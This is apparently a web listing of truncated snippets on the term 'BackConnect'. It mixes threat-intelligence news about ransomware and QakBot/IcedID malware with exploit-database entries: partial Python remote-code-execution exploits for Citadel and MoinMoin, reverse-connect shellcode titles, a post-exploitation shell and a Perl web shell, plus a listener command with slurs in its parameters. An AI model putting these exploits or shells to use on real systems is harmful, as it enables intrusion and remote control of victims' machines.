Researchers Link CACTUS Ransomware Tactics to Former Black Basta Affiliates

Threat actors deploying the Black Basta and CACTUS ransomware families have been found to rely on the same BackConnect BC module for maintaining persistent control over infected hosts, a sign that affiliates previously associated with Black Basta may have transitioned to CACTUS. "Once infiltrated...

Black Basta and Cactus Ransomware Groups Add BackConnect Malware to Their Arsenal

In this blog entry, we discuss how the Black Basta and Cactus ransomware groups utilized the BackConnect malware to maintain persistent control and exfiltrate sensitive data from compromised machines...

QakBot-Linked BC Malware Adds Enhanced Remote Access and Data Gathering Features

Cybersecurity researchers have disclosed details of a new BackConnect BC malware that has been developed by threat actors linked to the infamous QakBot loader. "BackConnect is a common feature or module utilized by threat actors to maintain persistence and perform tasks," Walmart's Cyber...

QakBot Malware Operators Expand C2 Network with 15 New Servers

The operators associated with the QakBot aka QBot malware have set up 15 new command-and-control C2 servers as of late June 2023. The findings are a continuation of the malware's infrastructure analysis from Team Cymru, and arrive a little over two months after Lumen Black Lotus Labs revealed tha...

IcedID Malware Adapts and Expands Threat with Updated BackConnect Module

The threat actors linked to the malware loader known as IcedID have made updates to the BackConnect BC module that's used for post-compromise activity on hacked systems, new findings from Team Cymru reveal. IcedID, also called BokBot, is a strain of malware similar to Emotet and QakBot that start...

Owner of DDoS mitigation firm launched DDoS attacks on others

By Waqas The owner of Cybersecurity firm BackConnect turned from cyber defender to cyber criminal... This is a post from HackRead.com Read the original post: Owner of DDoS mitigation firm launched DDoS attacks on others...

DDoS Mitigation Firm Founder Admits to DDoS

A Georgia man who co-founded a service designed to protect companies from crippling distributed denial-of-service DDoS attacks has pleaded to paying a DDoS-for-hire service to launch attacks against others. Tucker Preston, 22, of Macon, Ga., pleaded guilty last week in a New Jersey court to one...

PostShell - Post Exploitation Bind/Backconnect Shell

PostShell is a post-exploitation shell that includes both a bind and a back connect shell. It creates a fully interactive TTY which allows for job control. The stub size is around 14kb and can be compiled on any Unix like system. Why not use a traditional Backconnect/Bind Shell? PostShell allows...

Malware exploit: Citadel

Type: Remote Code Execution Author: Xylitol import urllib import urllib2 Citadel Backconnect Server 1.3.5.1 Remote Code Execution vulnerability Work only on windows box def requesturl, params=None, method='GET': if method == 'POST': urllib2.urlopenurl, urllib.urlencodeparams.read elif method ==...

Malware exploit: Citadel Server V1.3.5.1

Type: Remote Code Execution Author: Xylitol import urllib import urllib2 Citadel Backconnect Server 1.3.5.1 Remote Code Execution vulnerability Work only on windows box def requesturl, params=None, method='GET': if method == 'POST': urllib2.urlopenurl, urllib.urlencodeparams.read elif method ==...

MoinMoin - Arbitrary Command Execution

No description provided by source. !/usr/bin/env python -- coding: utf-8 -- ascii = '\x1b1;31m' ascii +=' \r\n' ascii +=' ?????????? ?????? ??? ??? ??? ?????????? ???????? ??? ??????? \r\n' ascii +=' ??????????? ???????? ??? ???? ??? ??????????? ???????? ??? ??????? \r\n' ascii +=' ??? ??? ??? ??...

Citadel Backconnect Server 1.3.5.1 Remote Code Execution vulnerability

start "backgroundexec" cbcs.exe listen -cp:faggot -bp:hacker | echo "" shell.php Usage Info Edit the code and run ! import urllib import urllib2 Citadel Backconnect Server 1.3.5.1 Remote Code Execution vulnerability Work only on windows box def requesturl, params=None, method='GET': if method ==...

MoinMoin - Arbitrary Command Execution

!/usr/bin/env python -- coding: utf-8 -- ascii = '\x1b1;31m' ascii +=' \r\n' ascii +=' ██████████ ██████ ███ ███ ███ ██████████ ████████ ███ ███████ \r\n' ascii +=' ███████████ ████████ ███ ████ ███ ███████████ ████████ ███ ███████ \r\n' ascii +=' ██▒ ██▒ ██▒ ██▒ ███ ██▒ ██▒█▒███ ██▒ ██▒ ██▒ ██▒...

MoinMoin - Arbitrary Command Execution

MoinMoin - Arbitrary Command Execution !/usr/bin/env python -- coding: utf-8 -- ascii = '\x1b1;31m' ascii +=' \r\n' ascii +=' ██████████ ██████ ███ ███ ███ ██████████ ████████ ███ ███████ \r\n' ascii +=' ███████████ ████████ ███ ████ ███ ███████████ ████████ ███ ███████ \r\n' ascii +=' ██▒ ██▒ ██...

win32/xp sp2 ARABIC (ar) backconnect + acceptconnection 376 bytes

-------- Title : windows xp sp2 ARABIC backconnect + acceptconnection shellcode =376 bytes Author : TrOoN E-mail : www.facebook.com/fysl.fyslm Home : city 617 logt Draria algeria | Web Site : www.1337day.com platform :windows xp arabic sp2 | Type : local root / exploit / shellcode / etc download...

linux/x86 BackBox BackConnect & Reverse TCP SSL shellcode 442 bytes

Title :Linux x86 BackBox BackConnect & Reverse TCP SSL shellcode 442 bytes Author : TrOoN E-mail : www.facebook.com/fysl.fyslm Home : city 617 logt Draria algeria Web Site : www.1337day.com platform :backboX 32 bit Eng Type : local root / exploit / shellcode / etc download link : backbox.org...

PPS 4.0 perl-cgi web shell

PPS 4.0 perl-cgi web shell Данная утилита предназначенна для системных администраторов для удаленного управления своим сервером. Любое незаконное использование скрипта преследуется по закону. SIZE: 55.88 KB last update - 12.07.2013 09:45 Авторизация на cookies SystemInfo - информация о сервере Fi...